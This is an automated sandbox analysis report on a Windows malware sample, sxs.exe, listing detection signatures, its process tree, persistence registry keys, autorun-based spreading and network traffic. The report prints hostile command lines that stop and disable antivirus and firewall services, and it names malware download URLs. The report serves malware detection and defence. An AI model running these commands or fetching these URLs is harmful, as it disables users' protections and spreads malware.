Windows Analysis Report
sxs.exe

Overview

General Information

Sample name: sxs.exe
Analysis ID: 1501290
MD5: 4f89e3a88853265154e24969581fb45a
SHA1: d5ae12cfe50ac91702da2ccd4e21321ef256ea2a
SHA256: ee77a17f0c1ff00fb7eb9a453ec22bb63ae382256211b6aa5db67c48e52fed73

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Allocates memory in foreign processes
Changes autostart functionality of drives
Contains functionality to inject code into remote processes
Contains functionality to inject threads in other processes
Drops executables to the windows directory (C:\Windows) and starts them
Found evasive API chain (may stop execution after checking mutex)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses regedit.exe to modify the Windows registry
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks for available system drives (often done to infect USB drives)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to search for IE or Outlook window (often done to steal information)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Explorer Process Tree Break
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Uses net.exe to stop services

Classification

  • System is w10x64
  • sxs.exe (PID: 4284 cmdline: "C:\Users\user\Desktop\sxs.exe" MD5: 4F89E3A88853265154E24969581FB45A)
    • iexplore.exe (PID: 5540 cmdline: "C:\Program Files\Internet Explorer\iexplore.exe" MD5: CFE2E6942AC1B72981B3105E22D3224E)
    • explorer.exe (PID: 4080 cmdline: "C:\Windows\System32\explorer.exe" http://www.onefordvd.com MD5: DD6597597673F72E10C9DE7901FBA0A8)
    • wuauclt.exe (PID: 4764 cmdline: "C:\Windows\wuauclt.exe" MD5: 4F89E3A88853265154E24969581FB45A)
      • explorer.exe (PID: 7844 cmdline: "C:\Windows\System32\explorer.exe" http://www.onefordvd.com MD5: DD6597597673F72E10C9DE7901FBA0A8)
      • regedit.exe (PID: 7860 cmdline: "C:\Windows\System32\regedit.exe" /s C:\Windows\noruns.reg MD5: BD63D72DB4FA96A1E0250B1D36B7A827)
      • net.exe (PID: 7888 cmdline: "C:\Windows\System32\net.exe" stop sharedaccess MD5: 31890A7DE89936F922D44D677F681A7F)
        • conhost.exe (PID: 7924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • net1.exe (PID: 8160 cmdline: C:\Windows\system32\net1 stop sharedaccess MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
      • net.exe (PID: 7916 cmdline: "C:\Windows\System32\net.exe" stop KVWSC MD5: 31890A7DE89936F922D44D677F681A7F)
        • conhost.exe (PID: 7932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • net1.exe (PID: 6764 cmdline: C:\Windows\system32\net1 stop KVWSC MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
      • sc.exe (PID: 7956 cmdline: "C:\Windows\System32\sc.exe" config KVWSC start= disabled MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
        • conhost.exe (PID: 8056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • net.exe (PID: 7980 cmdline: "C:\Windows\System32\net.exe" stop KVSrvXP MD5: 31890A7DE89936F922D44D677F681A7F)
        • conhost.exe (PID: 8004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • net1.exe (PID: 1628 cmdline: C:\Windows\system32\net1 stop KVSrvXP MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
      • sc.exe (PID: 8012 cmdline: "C:\Windows\System32\sc.exe" config KVSrvXP start= disabled MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
        • conhost.exe (PID: 8036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • net.exe (PID: 8072 cmdline: "C:\Windows\System32\net.exe" stop kavsvc MD5: 31890A7DE89936F922D44D677F681A7F)
        • conhost.exe (PID: 8108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • net1.exe (PID: 8208 cmdline: C:\Windows\system32\net1 stop kavsvc MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
      • sc.exe (PID: 8088 cmdline: "C:\Windows\System32\sc.exe" config kavsvc start= disabled MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
        • conhost.exe (PID: 8124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 8140 cmdline: "C:\Windows\System32\sc.exe" config RsRavMon start= disabled MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
        • conhost.exe (PID: 7584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • net.exe (PID: 8172 cmdline: "C:\Windows\System32\net.exe" stop RsCCenter MD5: 31890A7DE89936F922D44D677F681A7F)
        • conhost.exe (PID: 7772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • net1.exe (PID: 8256 cmdline: C:\Windows\system32\net1 stop RsCCenter MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
      • sc.exe (PID: 7792 cmdline: "C:\Windows\System32\sc.exe" config RsCCenter start= disabled MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
        • conhost.exe (PID: 7436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • net.exe (PID: 7452 cmdline: "C:\Windows\System32\net.exe" stop RsRavMon MD5: 31890A7DE89936F922D44D677F681A7F)
        • conhost.exe (PID: 8060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • net1.exe (PID: 8296 cmdline: C:\Windows\system32\net1 stop RsRavMon MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
  • explorer.exe (PID: 6972 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: 662F4F92FDE3557E86D110526BB578D5)
    • chrome.exe (PID: 2260 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://www.onefordvd.com/ MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 4040 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2104 --field-trial-handle=2068,i,10012621105845313477,5144001626182359971,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • explorer.exe (PID: 7904 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: 662F4F92FDE3557E86D110526BB578D5)
    • chrome.exe (PID: 8324 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://www.onefordvd.com/ MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 8540 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 --field-trial-handle=2004,i,8456847473545843836,6778845690688114268,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • wuauclt.exe (PID: 9132 cmdline: "C:\Windows\wuauclt.exe" MD5: 4F89E3A88853265154E24969581FB45A)
    • iexplore.exe (PID: 7960 cmdline: "C:\Program Files\Internet Explorer\iexplore.exe" MD5: CFE2E6942AC1B72981B3105E22D3224E)
    • explorer.exe (PID: 8216 cmdline: "C:\Windows\explorer.exe" http://www.dvdforone.com MD5: 662F4F92FDE3557E86D110526BB578D5)
  • explorer.exe (PID: 7984 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: 662F4F92FDE3557E86D110526BB578D5)
    • chrome.exe (PID: 7360 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://www.dvdforone.com/ MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 7980 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2088 --field-trial-handle=2028,i,12403838513569625985,14954567300867270703,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), @gott_cyber | Data: Command: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, CommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\explorer.exe, NewProcessName: C:\Windows\explorer.exe, OriginalFileName: C:\Windows\explorer.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 752, ProcessCommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, ProcessId: 6972, ProcessName: explorer.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Windows\wuauclt.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\sxs.exe, ProcessId: 4284, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft
Source: Process started | Author: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements) | Data: Command: "C:\Windows\System32\net.exe" stop sharedaccess, CommandLine: "C:\Windows\System32\net.exe" stop sharedaccess, CommandLine|base64offset|contains: ), Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: "C:\Windows\wuauclt.exe" , ParentImage: C:\Windows\wuauclt.exe, ParentProcessId: 4764, ParentProcessName: wuauclt.exe, ProcessCommandLine: "C:\Windows\System32\net.exe" stop sharedaccess, ProcessId: 7888, ProcessName: net.exe
Source: Process started | Author: Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems) | Data: Command: "C:\Windows\System32\net.exe" stop sharedaccess, CommandLine: "C:\Windows\System32\net.exe" stop sharedaccess, CommandLine|base64offset|contains: ), Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: "C:\Windows\wuauclt.exe" , ParentImage: C:\Windows\wuauclt.exe, ParentProcessId: 4764, ParentProcessName: wuauclt.exe, ProcessCommandLine: "C:\Windows\System32\net.exe" stop sharedaccess, ProcessId: 7888, ProcessName: net.exe
No Suricata rule has matched

AV Detection

Source: sxs.exe | Avira: detected
Source: http://www.om7890.com/mfx/help.exe | Avira URL Cloud: Label: malware
Source: http://w.tw7890.com/ | Avira URL Cloud: Label: malware
Source: http://www.tw7890.com/twv/help.exehttp://www.om7890.com/mfx/help.exehttp://www.hg7890.com/hgb/help.e | Avira URL Cloud: Label: malware
Source: http://www.tw7890.com/twv/help.exe | Avira URL Cloud: Label: malware
Source: C:\Windows\wuauclt.exe | Avira: detection malicious, Label: TR/Crypt.ZPACK.Gen
Source: C:\Windows\wuauclt.exe | ReversingLabs: Detection: 91%
Source: sxs.exe | ReversingLabs: Detection: 91%
Source: C:\Windows\wuauclt.exe | Joe Sandbox ML: detected
Source: sxs.exe | Joe Sandbox ML: detected
Source: https://www.onefordvd.com/lander | HTTP Parser: No favicon
Source: https://www.onefordvd.com/lander | HTTP Parser: No favicon
Source: https://www.onefordvd.com/lander | HTTP Parser: No favicon
Source: https://www.onefordvd.com/lander | HTTP Parser: No favicon
Source: sxs.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: unknown | HTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:53808 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:53760 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:53773 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.5:53799 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.5:53809 version: TLS 1.2

Spreading

Source: C:\Windows\SysWOW64\regedit.exe | Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer NoDriveTypeAutoRun
Source: C:\Windows\wuauclt.exe | File opened: z:
Source: C:\Windows\wuauclt.exe | File opened: y:
Source: C:\Windows\wuauclt.exe | File opened: x:
Source: C:\Windows\wuauclt.exe | File opened: w:
Source: C:\Windows\wuauclt.exe | File opened: v:
Source: C:\Windows\wuauclt.exe | File opened: u:
Source: C:\Windows\wuauclt.exe | File opened: t:
Source: C:\Windows\wuauclt.exe | File opened: s:
Source: C:\Windows\wuauclt.exe | File opened: r:
Source: C:\Windows\wuauclt.exe | File opened: q:
Source: C:\Windows\wuauclt.exe | File opened: p:
Source: C:\Windows\wuauclt.exe | File opened: o:
Source: C:\Windows\wuauclt.exe | File opened: n:
Source: C:\Windows\wuauclt.exe | File opened: m:
Source: C:\Windows\wuauclt.exe | File opened: l:
Source: C:\Windows\wuauclt.exe | File opened: k:
Source: C:\Windows\wuauclt.exe | File opened: j:
Source: C:\Windows\wuauclt.exe | File opened: i:
Source: C:\Windows\wuauclt.exe | File opened: h:
Source: C:\Windows\wuauclt.exe | File opened: g:
Source: C:\Windows\wuauclt.exe | File opened: f:
Source: C:\Windows\wuauclt.exe | File opened: e:
Source: C:\Windows\explorer.exe | File opened: c:
Source: sxs.exe | Binary or memory string: \autorun.inf
Source: sxs.exe | Binary or memory string: [AutoRun]
Source: sxs.exe, 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp | Binary or memory string: \autorun.inf
Source: sxs.exe, 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp | Binary or memory string: [AutoRun]
Source: sxs.exe, 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp | Binary or memory string: [AutoRun]
Source: wuauclt.exe | Binary or memory string: \autorun.inf
Source: wuauclt.exe | Binary or memory string: [AutoRun]
Source: wuauclt.exe, 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp | Binary or memory string: \autorun.inf
Source: wuauclt.exe, 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp | Binary or memory string: [AutoRun]
Source: wuauclt.exe, 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp | Binary or memory string: [AutoRun]
Source: wuauclt.exe | Binary or memory string: \autorun.inf
Source: wuauclt.exe | Binary or memory string: [AutoRun]
Source: wuauclt.exe, 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp | Binary or memory string: \autorun.inf
Source: wuauclt.exe, 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp | Binary or memory string: [AutoRun]
Source: wuauclt.exe, 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp | Binary or memory string: [AutoRun]
Source: C:\Users\user\Desktop\sxs.exe | Code function: 0_2_00404C8C FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,0_2_00404C8C
Source: C:\Windows\wuauclt.exe | Code function: 4_2_00404C8C FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,4_2_00404C8C
Source: C:\Windows\wuauclt.exe | Code function: 42_2_00404C8C FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,42_2_00404C8C
Source: Joe Sandbox View | IP Address: 104.26.2.70 104.26.2.70
Source: Joe Sandbox View | IP Address: 172.67.69.19 172.67.69.19
Source: Joe Sandbox View | IP Address: 15.197.204.56 15.197.204.56
Source: Joe Sandbox View | JA3 fingerprint: 1138de370e523e824bbca92d049a3777
Source: Joe Sandbox View | JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: unknown | HTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:53808 version: TLS 1.0
Source: unknown | TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown | TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown | TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown | TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown | TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown | TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown | TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown | TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown | TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown | TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown | TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown | TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown | TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown | TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown | TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown | TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown | TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown | TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown | TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown | TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown | TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown | TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown | TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown | TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown | TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown | TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown | TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown | TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown | TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown | TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown | TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown | TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown | TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown | TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown | TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown | TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown | TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown | TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown | TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown | TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown | TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown | TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown | TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown | TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown | TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: C:\Users\user\Desktop\sxs.exe | Code function: 0_2_004080C8 DeleteUrlCacheEntry,DeleteUrlCacheEntry,DeleteFileA,DeleteFileA,URLDownloadToFileA,DeleteUrlCacheEntry,0_2_004080C8
Source: global traffic | HTTP traffic detected: GET /lander HTTP/1.1 | Host: www.onefordvd.com | Connection: keep-alive | Upgrade-Insecure-Requests: 1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Sec-Fetch-Site: cross-site | Sec-Fetch-Mode: navigate | Sec-Fetch-Dest: document | sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" | sec-ch-ua-mobile: ?0 | sec-ch-ua-platform: "Windows" | Referer: http://www.onefordvd.com/ | Accept-Encoding: gzip, deflate, br | Accept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected: GET /tag?o=5097926782615552&upapi=true HTTP/1.1 | Host: btloader.com | Connection: keep-alive | sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" | sec-ch-ua-mobile: ?0 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 | sec-ch-ua-platform: "Windows" | Accept: */* | Sec-Fetch-Site: cross-site | Sec-Fetch-Mode: no-cors | Sec-Fetch-Dest: script | Referer: https://www.onefordvd.com/ | Accept-Encoding: gzip, deflate, br | Accept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected: GET /adsense/domains/caf.js?abp=1&gdabp=true HTTP/1.1 | Host: www.google.com | Connection: keep-alive | sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" | sec-ch-ua-mobile: ?0 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 | sec-ch-ua-platform: "Windows" | Accept: */* | X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX | Sec-Fetch-Site: cross-site | Sec-Fetch-Mode: no-cors | Sec-Fetch-Dest: script | Referer: https://www.onefordvd.com/ | Accept-Encoding: gzip, deflate, br | Accept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected: GET /px.gif?ch=2 HTTP/1.1 | Host: ad-delivery.net | Connection: keep-alive | sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" | sec-ch-ua-mobile: ?0 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 | sec-ch-ua-platform: "Windows" | Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8 | Sec-Fetch-Site: cross-site | Sec-Fetch-Mode: no-cors | Sec-Fetch-Dest: image | Referer: https://www.onefordvd.com/ | Accept-Encoding: gzip, deflate, br | Accept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected: GET /px.gif?ch=1&e=0.7379176731179411 HTTP/1.1 | Host: ad-delivery.net | Connection: keep-alive | sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" | sec-ch-ua-mobile: ?0 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 | sec-ch-ua-platform: "Windows" | Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8 | Sec-Fetch-Site: cross-site | Sec-Fetch-Mode: no-cors | Sec-Fetch-Dest: image | Referer: https://www.onefordvd.com/ | Accept-Encoding: gzip, deflate, br | Accept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected: GET /favicon.ico?ad=300x250&ad_box_=1&adnet=1&showad=1&size=250x250 HTTP/1.1 | Host: ad.doubleclick.net | Connection: keep-alive | sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" | sec-ch-ua-mobile: ?0 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 | sec-ch-ua-platform: "Windows" | Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8 | X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX | Sec-Fetch-Site: cross-site | Sec-Fetch-Mode: no-cors | Sec-Fetch-Dest: image | Referer: https://www.onefordvd.com/ | Accept-Encoding: gzip, deflate, br | Accept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected: GET /tag?o=5097926782615552&upapi=true HTTP/1.1 | Host: btloader.com | Connection: keep-alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 | Accept: */* | Sec-Fetch-Site: none | Sec-Fetch-Mode: cors | Sec-Fetch-Dest: empty | Accept-Encoding: gzip, deflate, br | Accept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected: GET /adsense/domains/caf.js?abp=1&gdabp=true HTTP/1.1 | Host: www.google.com | Connection: keep-alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 | Accept: */* | X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX | Sec-Fetch-Site: none | Sec-Fetch-Mode: cors | Sec-Fetch-Dest: empty | Accept-Encoding: gzip, deflate, br | Accept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected: GET /px.gif?ch=1&e=0.7550573385120041 HTTP/1.1 | Host: ad-delivery.net | Connection: keep-alive | sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" | sec-ch-ua-mobile: ?0 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 | sec-ch-ua-platform: "Windows" | Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8 | Sec-Fetch-Site: cross-site | Sec-Fetch-Mode: no-cors | Sec-Fetch-Dest: image | Referer: https://www.onefordvd.com/ | Accept-Encoding: gzip, deflate, br | Accept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected: GET /px.gif?ch=2 HTTP/1.1 | Host: ad-delivery.net | Connection: keep-alive | sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" | sec-ch-ua-mobile: ?0 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 | sec-ch-ua-platform: "Windows" | Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8 | Sec-Fetch-Site: cross-site | Sec-Fetch-Mode: no-cors | Sec-Fetch-Dest: image | Referer: https://www.onefordvd.com/ | Accept-Encoding: gzip, deflate, br | Accept-Language: en-US,en;q=0.9 | If-None-Match: "ad4b0f606e0f8465bc4c4c170b37e1a3" | If-Modified-Since: Wed, 05 May 2021 19:25:32 GMT
